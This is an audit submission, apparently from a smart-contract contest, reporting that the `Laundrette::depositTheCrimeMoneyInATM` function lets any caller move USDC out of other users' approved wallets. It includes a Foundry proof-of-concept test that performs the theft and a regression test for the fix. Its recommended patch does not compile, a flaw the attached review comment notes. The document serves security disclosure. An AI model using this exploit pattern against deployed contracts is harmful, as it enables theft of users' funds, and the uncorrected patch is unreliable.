Submission Details
Severity: high
Valid

Insecure access control in the `Laundrette::depositTheCrimeMoneyInATM` function allows anyone to move USDC out of other users' wallets

Description

The function `Laundrette::depositTheCrimeMoneyInATM` lets any external caller pass an arbitrary `account` parameter, and USDC is then transferred from that address. Users may lose USDC because of this.

Impact

An attacker can call this function with `account` set to any address that has a remaining USDC allowance and `to` set to himself (or anyone's address), stealing USDC from the `account` address. The attacker can later withdraw the USDC by burning `crimeMoney`.

Proof of Concept

```solidity
function test_depositOtherUSDC() public {
    address alice = makeAddr("alice");
    address bob = makeAddr("bob");

    // Fund alice and have her approve MoneyShelf for her own deposit.
    vm.prank(godFather);
    usdc.transfer(alice, 100e6);
    vm.prank(alice);
    usdc.approve(address(moneyShelf), 100e6);

    joinGangGodFather();
    joinGang(bob);

    // bob passes alice as `account` and himself as `to`.
    vm.prank(bob);
    laundrette.depositTheCrimeMoneyInATM(alice, bob, 100e6);

    // alice's USDC is gone and bob holds the matching crimeMoney.
    assertEq(usdc.balanceOf(alice), 0);
    assertEq(usdc.balanceOf(address(moneyShelf)), 100e6);
    assertEq(crimeMoney.balanceOf(bob), 100e6);
}
```
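A regression test for the caller check, written as an added example that is not part of the original submission or the project's code. `MockToken`, `Shelf`, `credit` and `ShelfTest` are hypothetical stand-ins, and forge-std is assumed to be installed as in any Foundry project.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import {Test} from "forge-std/Test.sol";

// Constructed stand-in for USDC: only the allowance logic the finding depends on.
contract MockToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    function mint(address to, uint256 amt) external { balanceOf[to] += amt; }
    function approve(address spender, uint256 amt) external { allowance[msg.sender][spender] = amt; }
    function transferFrom(address from, address to, uint256 amt) external {
        allowance[from][msg.sender] -= amt; // checked math reverts without allowance
        balanceOf[from] -= amt;
        balanceOf[to] += amt;
    }
}

// Hypothetical vault (not the project's MoneyShelf) with the caller check applied.
contract Shelf {
    MockToken public immutable token;
    mapping(address => uint256) public credit;
    constructor(MockToken t) { token = t; }
    function deposit(address account, address to, uint256 amt) external {
        // Only the owner of the funds may name themselves as `account`.
        require(account == msg.sender, "not account owner");
        token.transferFrom(account, address(this), amt);
        credit[to] += amt;
    }
}

contract ShelfTest is Test {
    MockToken token = new MockToken();
    Shelf shelf = new Shelf(token);
    address alice = makeAddr("alice");
    address bob = makeAddr("bob");
    function setUp() public {
        token.mint(alice, 100e6);
        vm.prank(alice);
        token.approve(address(shelf), 100e6); // alice's allowance is outstanding
    }
    function test_onlyOwnerOfFundsCanDeposit() public {
        vm.prank(bob);
        vm.expectRevert(bytes("not account owner"));
        shelf.deposit(alice, bob, 100e6); // third party naming alice is rejected
        assertEq(token.balanceOf(alice), 100e6); // her balance is untouched
        vm.prank(alice);
        shelf.deposit(alice, alice, 100e6); // the legitimate path still works
        assertEq(shelf.credit(alice), 100e6);
    }
}
```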

Recommendations

Ensure the caller is the same as the `account` parameter, and revert otherwise.

function depositTheCrimeMoneyInATM(address account, address to, uint256 amount) external {
++ if (!(account == msg.sender) {
++ revert("Laundrette: you are not authorized to call this function");
++ }
moneyShelf.depositUSDC(account, to, amount);
}
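Review bot: the added condition `if (!(account == msg.sender) {` opens two parentheses and closes only one, so the function will not compile as written; `if (account != msg.sender) {` is the simpler form. With `account` forced to equal `msg.sender`, the parameter no longer carries information, so consider dropping it from the signature and passing `msg.sender` to `moneyShelf.depositUSDC` directly. A custom error would also be cheaper than the revert string.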
Updates

Lead Judging Commences

n0kto Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Arbitrary account deposit, steal approval
